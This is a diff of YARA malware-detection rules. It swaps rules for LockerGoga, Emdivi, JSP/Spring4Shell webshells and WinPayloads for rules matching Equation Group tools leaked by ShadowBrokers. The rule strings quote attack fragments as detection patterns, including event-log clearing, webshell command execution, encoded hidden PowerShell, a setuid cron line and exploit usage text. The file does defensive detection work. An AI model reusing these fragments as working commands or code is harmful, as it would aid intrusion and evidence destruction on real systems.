+		description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba5836b9-bc47-54d4-8f7a-475ba0feaac6"
-		date = "2019-03-19"
+		id = "158e6ebc-6b43-5e94-9052-31408d848875"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_lockergoga.yar#L2-L26"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L345-L360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "076d799113f5bf6c00aa29895cca83ff86e89706cf15ca6971a991d345d0ad65"
+		logic_hash = "aa7fda8b95b697bb0541642677579f9db9df379048421481cdb66068032bf681"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15"
-		hash2 = "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26"
-		hash3 = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
 
 	strings:
-		$x1 = "\\.(doc|dot|wbk|docx|dotx|docb|xlm|xlsx|xltx|xlsb|xlw|ppt|pot|pps|pptx|potx|ppsx|sldx|pdf)" wide
-		$x2 = "|[A-Za-z]:\\cl.log" wide
-		$x4 = "\\crypto-locker\\" ascii
-		$xc1 = { 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E
-               00 61 00 6D 00 65 00 00 00 00 00 4D 00 6C 00 63
-               00 72 00 6F 00 73 00 6F 00 66 00 74 }
-		$xc2 = { 00 2E 00 6C 00 6F 00 63 00 6B 00 65 00 64 00 00
-               00 20 46 41 49 4C 45 44 20 00 00 00 00 20 00 00
-               00 20 75 6E 6B 6E 6F 77 6E 20 65 78 63 65 70 74
-               69 6F 6E }
-		$rn1 = "This may lead to the impossibility of recovery of the certain files." wide
+		$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
+		$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+		$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) ) or $rn1
+		( uint16( 0 ) == 0x2123 and filesize < 4KB and 1 of them )
 }
-rule SIGNATURE_BASE_Emdivi_SFX : FILE
+rule SIGNATURE_BASE_Equationgroup_Elgingamble
 {
 	meta:
-		description = "Detects Emdivi malware in SFX Archive"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "51367190-2e8d-507c-a19f-996bc6960977"
-		date = "2015-08-20"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L9-L28"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L362-L378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3257983c64c52f36b04e3fe7b12180a37531338349137d4df00fc6f704557b2e"
-		score = 70
+		logic_hash = "e561794d969b6198f71115087db8cc89043f2079252eef22458450e16596b0eb"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
-		hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
 
 	strings:
-		$x1 = "Setup=unsecess.exe" fullword ascii
-		$x2 = "Setup=leassnp.exe" fullword ascii
-		$s1 = "&Enter password for the encrypted file:" fullword wide
-		$s2 = ";The comment below contains SFX script commands" fullword ascii
-		$s3 = "Path=%temp%" fullword ascii
+		$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
+		$x2 = "[-] kernel not vulnerable" fullword ascii
+		$x3 = "[-] failed to spawn shell: %s" fullword ascii
+		$x4 = "-s shell           Use shell instead of %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 740KB and ( 1 of ( $x* ) and all of ( $s* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Emdivi_Gen1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Cmsd : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "807cf3f9-4f58-5d22-88b2-9adb7866979f"
-		date = "2015-08-20"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9cdd3562-fed4-5b79-b056-049279404eeb"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L32-L60"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L380-L397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1895926f6327bf301b8618f9162cacb30ad96f181f197559d399675e2cd93c6"
-		score = 80
+		logic_hash = "2b9c7ef750c2e45df7839395db51c93204bc9855f5de05bd59c50bb6a964bc8b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
-		hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
-		hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
-		hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
 
 	strings:
-		$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
-		$x2 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
-		$x3 = "userControl-v80.exe" fullword ascii
-		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
-		$s2 = "http://www.msftncsi.com" fullword wide
-		$s3 = "net use | find /i \"c$\"" fullword wide
-		$s4 = " /del /y & " fullword wide
-		$s5 = "\\auto.cfg" wide
-		$s6 = "/ncsi.txt" fullword wide
-		$s7 = "Dcmd /c" fullword wide
-		$s8 = "/PROXY" fullword wide
+		$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
+		$x2 = "error: not vulnerable" fullword ascii
+		$s1 = "port=%d connected! " fullword ascii
+		$s2 = "xxx.XXXXXX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Emdivi_Gen2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ebbshave : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "9a77c85c-84b0-5e0f-93bc-e17e2aaec095"
-		date = "2015-08-20"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L62-L85"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L399-L415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c40306d646c5bf8c3aff1bc697b81997b4d635ccf237775e2bea96b89f7fa001"
-		score = 80
+		logic_hash = "8a1a5ddefc646dc55161eb9b2a1b0e4176df7e99660db48b245af3ef9ab0871c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
-		hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
-		hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
 
 	strings:
-		$s1 = "%TEMP%\\IELogs\\" ascii
-		$s2 = "MSPUB.EXE" fullword ascii
-		$s3 = "%temp%\\" ascii
-		$s4 = "\\NOTEPAD.EXE" ascii
-		$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
-		$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
-		$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
+		$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
+		$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
+		$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
+		$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1300KB and 6 of them
+		( uint16( 0 ) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Emdivi_Gen3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Eggbasket : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3d712ae-3f8e-578c-81cd-fd3e48213875"
-		date = "2015-08-20"
-		modified = "2023-01-06"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L87-L114"
+		id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L417-L432"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff89a0855481d723f23e0c00f6b6eaf912e6df3a7e9ebe4ff1e6ccf2b02f0888"
-		score = 80
+		logic_hash = "e4800d5c820a18d3483dc5c055c0e2f5374ce3b160ecb4d940a00ec4a90ca50d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
-		hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
-		$s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii
-		$s4 = "\\auto.cfg" ascii
-		$s5 = "/ncsi.txt" fullword ascii
-		$s6 = "/en-us/default.aspx" fullword ascii
-		$s7 = "cmd /c" fullword ascii
-		$s9 = "APPDATA" fullword ascii
+		$x1 = "# Building Shellcode into exploit." fullword ascii
+		$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
+		$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 850KB and ( ( $x1 and 1 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Emdivi_Gen4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jparsescan : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "02629873-a797-51ff-83fc-af499cafa1e8"
-		date = "2015-08-20"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L116-L143"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L434-L448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9c1645023ceefdb849cf4b0e60de8c608bfd5e15d3aac6d16d68a36140a8ebed"
-		score = 80
-		quality = 79
+		logic_hash = "d86b6757abb5ad1902e91f100e6a6bea52e6e14684d184b6b8138270484275f4"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
-		hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
-		hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
-		hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
-		hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
-		hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
 
 	strings:
-		$s1 = ".http_port\", " fullword wide
-		$s2 = "UserAgent: " fullword ascii
-		$s3 = "AUTH FAILED" fullword ascii
-		$s4 = "INVALID FILE PATH" fullword ascii
-		$s5 = ".autoconfig_url\", \"" fullword wide
-		$s6 = "FAILED TO WRITE FILE" fullword ascii
-		$s7 = ".proxy" fullword wide
-		$s8 = "AuthType: " fullword ascii
-		$s9 = ".no_proxies_on\", \"" fullword wide
+		$s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+		$s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 853KB and all of them
+		( filesize < 40KB and 1 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Nov21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Sambal : FILE
 {
 	meta:
-		description = "Detects JSP webshells"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
 		author = "Florian Roth (Nextron Systems)"
-		id = "117eed28-c44e-5983-b4c7-b555fc06d923"
-		date = "2021-11-23"
+		id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.ic3.gov/Media/News/2021/211117-2.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L2-L17"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L450-L467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1dac7706421961c71ba6f8d7a223b80e4b77bf206bfb64ee18c7cc894b062a3c"
-		score = 70
+		logic_hash = "6066332b16996a9d8635d3752f46c6529cfc2c94d3d6f0c9791f2068c982bf3e"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
 
 	strings:
-		$x1 = "request.getParameter(\"pwd\")" ascii
-		$x2 = "excuteCmd(request.getParameter(" ascii
-		$x3 = "getRuntime().exec (request.getParameter(" ascii
-		$x4 = "private static final String PW = \"whoami\"" ascii
+		$s1 = "+ Bruteforce mode." fullword ascii
+		$s3 = "+ Host is not running samba!" fullword ascii
+		$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
+		$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
+		$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
 
 	condition:
-		filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Indicators_Mar22_1
+rule SIGNATURE_BASE_Equationgroup_Pclean_V2_1_1_2 : FILE
 {
 	meta:
-		description = "Detects indicators found after SpringCore exploitation attempts and in the POC script"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
 		author = "Florian Roth (Nextron Systems)"
-		id = "297e4b57-f831-56e0-a391-1ffbc9a4d438"
-		date = "2022-03-30"
+		id = "1b31af01-8c30-513a-a615-82dcb940e06d"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L19-L34"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L469-L483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39fb62ec7953dae0a88e39e73e3ff286fc19cb8f21f8feb869a1875f6ba70cfb"
-		score = 70
+		logic_hash = "9323ef0c76348d242b010cf0f1c6a1bf5dd120a02418350bb0ed137f468ac624"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
 
 	strings:
-		$x1 = "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di"
-		$x2 = "?pwd=j&cmd=whoami"
-		$x3 = ".getParameter(%22pwd%22)"
-		$x4 = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B"
+		$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
+		$s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Webshell_Mar22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Envisioncollision : FILE
 {
 	meta:
-		description = "Detects webshell found after SpringCore exploitation attempts POC script"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7047c98-3c60-5211-9ad5-2bfdfb35d493"
-		date = "2022-03-30"
+		id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L36-L50"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L485-L501"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "17282b66899356a6051f0b47a7a3f02265737283d760f2256e03a2b934bb63b8"
-		score = 70
+		logic_hash = "8cd8c24b212ca71feb6093682fc614c88790c10d7c7d72dac65b047e5791894a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
 
 	strings:
-		$x1 = ".getInputStream(); int a = -1; byte[] b = new byte[2048];"
-		$x2 = "if(\"j\".equals(request.getParameter(\"pwd\")"
-		$x3 = ".getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();"
+		$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
+		$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
+		$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
+		$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Winpayloads_Powershell : FILE
+rule SIGNATURE_BASE_Equationgroup_Cmsex : FILE
 {
 	meta:
-		description = "Detects WinPayloads PowerShell Payload"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6b8823-4656-5b0d-9a1e-84045287f5bf"
-		date = "2017-07-11"
+		id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/nccgroup/Winpayloads"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winpayloads.yar#L12-L28"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L503-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9e75f7190327f08c5e204977c6714c93951a6db0ddf000c8b37db37131b9def"
+		logic_hash = "997e08a49c5ae82bcc590e5febd449a4d3e9098f5aa154ccc0824b976f0a6365"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "011eba8f18b66634f6eb47527b4ceddac2ae615d6861f89a35dbb9fc591cae8e"
+		hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
 
 	strings:
-		$x1 = "$Base64Cert = 'MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCCCTAEggksMIIJKDCCA98GCSqGSIb3DQEHBqCCA9AwggPMAgEAMIIDxQYJKoZIhvcNAQcBMBwGCiqGSIb3D" ascii
-		$x2 = "powershell -w hidden -noni -enc SQBF" fullword ascii nocase
-		$x3 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwA" ascii
-		$x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii
+		$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
+		$x2 = "-i target ip address / hostname " fullword ascii
+		$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
+		$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
+		$x5 = "If one choice fails, you may want to try another." fullword ascii
 
 	condition:
-		filesize < 10KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Winpayloads_Payload : FILE
+rule SIGNATURE_BASE_Equationgroup_Exze : FILE
 {
 	meta:
-		description = "Detects WinPayloads Payload"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
 		author = "Florian Roth (Nextron Systems)"
-		id = "44fae324-1fc8-5417-950a-8a3783b6d2ae"
-		date = "2017-07-11"
+		id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/nccgroup/Winpayloads"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winpayloads.yar#L30-L50"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L522-L537"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a22eeafa320bcf0d41de402223d3ad51d8625ffaa68fe24be864ffcf72a64a2"
+		logic_hash = "b8678f58da689be9507a345b6b80ece6cdb7a78d73db339bdc15ad0a66b4a2e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573"
-		hash2 = "35069905d9b7ba1fd57c8df03614f563504194e4684f47aafa08ebb8d9409d0b"
-		hash3 = "a28d107f168d85c38fc76229b14561b472e60e60973eb10b6b554c1f57469322"
-		hash4 = "ed93e28ca18f749a78678b1e8e8ac31f4c6c0bab2376d398b413dbdfd5af9c7f"
-		hash5 = "26f5aee1ce65158e8375deb63c27edabfc9f5de3c1c88a4ce26a7e50b315b6d8"
-		hash6 = "b25a515706085dbde0b98deaf647ef9a8700604652c60c6b706a2ff83fdcbf45"
+		hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
 
 	strings:
-		$s1 = "bpayload.exe.manifest" fullword ascii
-		$s2 = "spayload" fullword ascii
+		$s1 = "shellFile" fullword ascii
+		$s2 = "completed.1" fullword ascii
+		$s3 = "zeke_remove" fullword ascii
 
